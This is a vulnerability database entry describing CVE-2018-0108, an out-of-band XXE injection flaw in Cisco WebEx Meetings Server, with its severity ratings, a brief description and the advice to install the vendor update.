Main Vulnerability Database Vulnerabilities #VU10100

XXE attack in Cisco WebEx Meetings Server - CVE-2018-0108

Published: January 18, 2018

Vulnerability identifier: #VU10100

CSH Severity: Low

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear

CVE-ID: CVE-2018-0108

CWE-ID: CWE-611

Exploitation vector: Remote access

Exploit availability: No public exploit available

Vendor: Cisco Systems, Inc

Affected software:
Cisco WebEx Meetings Server

Detailed vulnerability description

The vulnerability allows a remote authenticated attacker to conduct XXE attack.

The vulnerability exists due to the ability of an attacker to perform an out-of-band XXE injection. A remote attacker can capture customer files and redirect them to another destination address to discover sensitive customer data.

Successful exploitation of the vulnerability results in information disclosure.

How to mitigate CVE-2018-0108

Install update from vendor's website.

Sources

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180117-wms

XXE attack in Cisco WebEx Meetings Server - CVE-2018-0108

Detailed vulnerability description

How to mitigate CVE-2018-0108

Sources

Please verify you're human